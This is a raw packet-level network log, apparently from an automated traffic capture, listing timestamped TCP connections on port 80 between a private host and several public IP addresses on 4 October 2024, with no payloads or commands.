                                                                                                                                              Oct 4, 2024 08:10:14.445249081 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.445267916 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445322990 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445393085 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.445511103 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:15.799649000 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.817070961 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.970839977 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:16.970983982 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.978709936 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.978745937 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:17.132852077 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.132863045 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.132872105 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.132934093 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133054972 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133064032 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133213043 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133332014 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133476019 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:17.133799076 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133884907 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133896112 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.134057045 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:18.486531973 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.503962040 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.657819986 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.657957077 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.663079977 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.816947937 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817035913 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817152977 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817277908 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817346096 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.817537069 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817682981 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.817724943 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817769051 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.817956924 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.818005085 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.818151951 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.818315983 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.818484068 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.818547010 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.818736076 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.970948935 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.971148014 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.971199036 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.971215963 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.971354961 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.971404076 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.971534014 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:19.971775055 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:19.973725080 CEST4978380192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:20.127089024 CEST8049783137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:25.095241070 CEST4978480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:25.194469929 CEST80497843.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:25.194622993 CEST4978480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:25.202219963 CEST4978480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:25.301348925 CEST80497843.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:26.703408003 CEST4978480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:26.844978094 CEST80497843.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:27.720856905 CEST4978580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:27.820383072 CEST80497853.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:27.820538044 CEST4978580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:27.828198910 CEST4978580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:27.927789927 CEST80497853.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:27.929341078 CEST80497853.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:27.929483891 CEST4978580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:29.343475103 CEST4978580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:29.446562052 CEST80497853.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.361037970 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:30.465964079 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.466109037 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:30.474956989 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:30.475012064 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:30.475054026 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:30.475224018 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:30.575292110 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.575319052 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.575402021 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.575412035 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.575431108 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.575509071 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.575517893 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.576103926 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:30.576242924 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:31.983565092 CEST4978680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:32.082814932 CEST80497863.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:33.001111984 CEST4978780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:33.100933075 CEST80497873.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:33.101089954 CEST4978780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:33.107224941 CEST4978780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:33.210997105 CEST80497873.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:34.124681950 CEST80497873.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:34.124696970 CEST80497873.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:34.124919891 CEST4978780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:34.126806974 CEST4978780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:34.127912998 CEST80497873.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:34.128055096 CEST4978780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:34.226660967 CEST80497873.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:40.617902040 CEST80497843.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:40.618182898 CEST4978480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:10:42.211879969 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:10:43.215425968 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:10:45.230551958 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:10:49.245323896 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:10:57.259219885 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:11:08.290529013 CEST4978880192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:08.392492056 CEST804978813.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:08.392673969 CEST4978880192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:08.400270939 CEST4978880192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:08.503047943 CEST804978813.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:08.503699064 CEST804978813.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:08.503853083 CEST4978880192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:09.912667036 CEST4978880192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:10.015228033 CEST804978813.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:10.930129051 CEST4978980192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:11.030838966 CEST804978913.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:11.030972004 CEST4978980192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:11.038558006 CEST4978980192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:11.138832092 CEST804978913.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:11.139508963 CEST804978913.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:11.139810085 CEST4978980192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:12.552710056 CEST4978980192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:12.652507067 CEST804978913.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.570816040 CEST4979080192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:13.673832893 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.674027920 CEST4979080192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:13.681725025 CEST4979080192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:13.681761026 CEST4979080192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:13.681834936 CEST4979080192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:13.782948971 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783114910 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783123970 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783257961 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783267975 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783293962 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783303976 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:13.783375025 CEST804979013.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:16.210242033 CEST4979180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:16.312968969 CEST804979113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:16.313157082 CEST4979180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:16.318273067 CEST4979180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:16.419604063 CEST804979113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:16.420979023 CEST804979113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:16.420989990 CEST804979113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:16.421246052 CEST4979180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:16.423163891 CEST4979180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:11:16.525039911 CEST804979113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:21.427872896 CEST4979280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:21.527841091 CEST80497923.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:21.527976990 CEST4979280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:21.535525084 CEST4979280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:21.635413885 CEST80497923.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:21.637335062 CEST80497923.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:21.637551069 CEST4979280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:23.050405025 CEST4979280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:23.150185108 CEST80497923.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:24.067791939 CEST4979380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:24.167546988 CEST80497933.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:24.167692900 CEST4979380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:24.175199986 CEST4979380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:24.275115013 CEST80497933.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:24.291117907 CEST80497933.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:24.291249990 CEST4979380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:25.690447092 CEST4979380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:25.790218115 CEST80497933.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.707860947 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:26.807259083 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.807476997 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:26.815181017 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:26.815258026 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:26.815279961 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:26.914624929 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.914635897 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.914644957 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.914751053 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.914762020 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.914783001 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.914792061 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.916887999 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:26.917056084 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:28.330570936 CEST4979480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:28.430069923 CEST80497943.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:29.349833012 CEST4979580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:29.449532032 CEST80497953.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:29.449698925 CEST4979580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:29.455898046 CEST4979580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:29.555438995 CEST80497953.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:29.558336020 CEST80497953.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:29.558346987 CEST80497953.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:29.558581114 CEST4979580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:29.560483932 CEST4979580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:29.565231085 CEST80497953.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:29.565462112 CEST4979580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:29.659993887 CEST80497953.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:34.565625906 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:34.667814016 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:34.667996883 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:34.675734043 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:34.775960922 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:35.698299885 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:35.698478937 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:36.188082933 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:36.291033983 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.205528975 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:37.309340000 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.309519053 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:37.317085028 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:37.416981936 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.424069881 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.424218893 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:38.828165054 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:38.932383060 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:39.845571995 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.945408106 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:39.945555925 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.954304934 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.954355001 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.954404116 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:40.062774897 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062846899 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062855005 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062864065 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062979937 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062988043 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062995911 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.971565008 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.971707106 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:41.468214035 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:41.567713976 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.485656023 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.584961891 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.585113049 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.590176105 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.689469099 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.691457033 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.691566944 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.691843987 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.693754911 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.697814941 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.698019981 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.792893887 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:47.703289032 CEST4980080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:47.802707911 CEST804980084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:47.802826881 CEST4980080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:47.810385942 CEST4980080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:47.910540104 CEST804980084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:47.910552025 CEST804980084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:50.344727993 CEST4980180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:50.444432020 CEST804980184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:50.444612026 CEST4980180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:50.452119112 CEST4980180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:50.552637100 CEST804980184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:50.552732944 CEST804980184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:52.983656883 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.083967924 CEST804980284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:53.084136009 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.091892004 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.091913939 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.092005968 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.193011045 CEST804980284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:53.193104982 CEST804980284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.623394966 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.723782063 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.724046946 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.729990959 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.831161976 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831248999 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831346989 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831407070 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831487894 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831624985 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.831748962 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831762075 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831794977 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.831851959 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831904888 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831959009 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.832132101 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.832132101 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.834855080 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.934484959 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:00.842451096 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:00.996315002 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:00.996603012 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:01.004034996 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:01.157473087 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:01.158198118 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:01.158207893 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:01.158312082 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:02.510467052 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.527823925 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.681307077 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.681521893 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.689009905 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.842689991 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.843426943 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.843436956 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.843559980 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:05.197405100 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.214737892 CEST4980680192.168.11.2054.67.87.110
